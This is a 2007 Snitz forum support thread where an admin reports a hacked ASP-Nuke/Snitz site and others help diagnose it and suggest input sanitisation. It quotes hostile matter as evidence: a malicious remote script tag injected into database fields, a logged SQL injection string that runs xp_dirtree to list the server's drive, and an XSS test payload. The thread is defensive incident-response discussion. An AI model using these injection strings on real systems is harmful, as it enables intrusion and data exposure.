| Author |
 Topic  |
|
|
gpspassion
Junior Member
260 Posts |
 Posted - 03 November 2007 : 10:53:29
|
Just a quick heads up on users of the Snitz forums, I've just been attacked/hacked and as a result this code : <script src="hxxp://yl18.net/0.js"></script> got inserted in at least the following fields :
Forums : F_Description
Members : M_SIG
Apparently that script installs an HTML/Ani virus, didn't find much about it.
Not sure how that happened, but I did notice a D99_temp table that was created yesterday that has already been reported here I think and that lists the contents of the D drive.
It happened a couple of hours so I'm going to be restoring last night's backup, hoping it's clean...
Any thoughts on the problem ? Preventing, fixing ? Finding out who did it ? Would SQL logs help ? Not sure where to look.
PS - Actually I'm surprised the forum was able to execute a <script> is there a way I can prevent that from happening in the future ? I guess I could put </script> in the banned word list.
UPDATE - looks like this is a known problem -> http://www.webmasterforums.com/windows-web-security/5612-page-being-hijacked-3.html with a fix, but it seems a bit complex will have to read that quietly. |
Edited by - gpspassion on 03 November 2007 11:26:31 |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
MarcelG
Retired Support Moderator
Netherlands
2625 Posts |
Posted - 03 November 2007 : 12:07:45
|
How does it end up in F_DESCRIPTION ? Only admins can make forums if I'm not mistaking, and only Mods can alter the description..... |
portfolio - linkshrinker - oxle - twitter |
 |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 03 November 2007 : 12:15:24
|
| You will need to have a look at the web server logs to find out how it was done. This may be a Snitz issue or not. I've seen a forum hacked in a similar way, but they got in through another page, not a forum one, so finding out how they got in is essential for you to prevent new hacks. |
Snitz 3.4 Readme | Like the support? Support Snitz too |
|
|
|
modifichicci
Average Member
Italy
787 Posts |
Posted - 03 November 2007 : 12:25:31
|
it can happens if an input isn't clean from scripting, as in advanced search mod, the string you are searcing is displayed without sanification and it lead to a scripting execute.(for everyone using that mod, check for that!)
But you have not that mod installed and your search page is safe.
you can test your input modules with this simple script:
<script>alert('ciao');</script>
if there is an hole you will have a message saying "Ciao"
PS, I have seen you have your portal page based on asp nuke. Maybe some of this code isn't so safe as it look.. |
Ernia e Laparocele
Forum di Ernia e Laparocele
Acces - MySql Migration Tutorial
Adamantine forum |
Edited by - modifichicci on 03 November 2007 12:27:22 |
|
|
|
gpspassion
Junior Member
260 Posts |
Posted - 03 November 2007 : 13:00:34
|
Thanks all for pitching in.
So here's what they did at first : creation of the D99_Tmp table.
2007-11-02 16:37:41 W3SVC1 xxxxxxxxx GET /fr/news.asp id=707;DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"C:\",%201,1-- 80 - 121.33.6.51 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0
It seems they're getting in from one of the portal tables /fr/news.asp - ASP-Nuke yes.
How they added <script src="hxxp://yl18.net/0.js"></script> after that I don't know, but it's really similar to the problem described here http://www.webmasterforums.com/windows-web-security/5612-page-being-hijacked-3.html - including the nice IP from China...http://www.zoneedit.com/whois.html?zone=121.33.6.51
It seems a quick fix would be to "Fix your initial Database logins to not have dbo or sa access to the DB server. Lock down your DB access." - not sure how to do that though, any pointers ?
While I'm at it, anyone good recommendations for a firewall ? It seems BLACKICE PC Protection Firewall Software has been discontinued. I use the built-in WS2003 firewall for now and can't even seem to block IPs.
PS - BTW, this thread should probably be moved out of public view at some point as it might give ideas...
|
Edited by - gpspassion on 03 November 2007 13:04:20 |
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 03 November 2007 : 13:30:04
|
The fix is to sanitize the input to news.asp, by doing something similar to the way Snitz handles such situations. For example,
newsID = CLng(Request.QueryString("id"))
Then use newsID whenever you want to use the value passed in the querystring.
Strategies such as these should be used in all pages. This should be enough to protect you against new hacks. |
Snitz 3.4 Readme | Like the support? Support Snitz too |
|
|
|
Etymon
Advanced Member
United States
2395 Posts |
Posted - 03 November 2007 : 15:51:37
|
newsID = CLng(Request.QueryString("id"))
 |
|
|
| |
Topic |
|
Topic Locked
